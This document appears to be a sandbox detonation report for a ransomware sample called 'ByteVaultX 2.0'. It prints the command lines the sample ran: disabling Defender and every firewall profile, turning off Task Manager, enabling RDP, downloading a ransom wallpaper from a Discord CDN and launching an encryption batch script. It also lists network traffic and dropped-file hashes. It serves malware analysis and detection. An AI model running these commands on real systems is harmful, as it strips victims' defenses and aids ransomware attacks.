C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1364 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29282\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI29282\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI29282\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
C:\Users\Admin\AppData\Local\Temp\_MEI29282\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI29282\libffi-8.dll

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_cffi_backend.cp312-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI29282\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI29282\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI29282\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI29282\libcrypto-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI29282\cryptography\hazmat\bindings\_rust.pyd

memory/1680-197-0x00007FFA1EFC0000-0x00007FFA1F0CB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxzp20l4.1nd.ps1

memory/1680-207-0x000001BE11BC0000-0x000001BE11BE2000-memory.dmp

memory/1680-210-0x00007FFA1EFC0000-0x00007FFA1F0CB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Encrypt\encrypt.bat

\??\pipe\LOCAL\crashpad_4068_BBYNUNBLQNFGCQNE

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Encrypt\encrypt.html

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\09e70805-8641-4e88-83bf-28ff3a9cf2c1.tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-25 23:42

Reported

2024-05-26 00:00

Platform

win11-20240426-en

Max time kernel

1050s

Max time network

1051s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (156) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
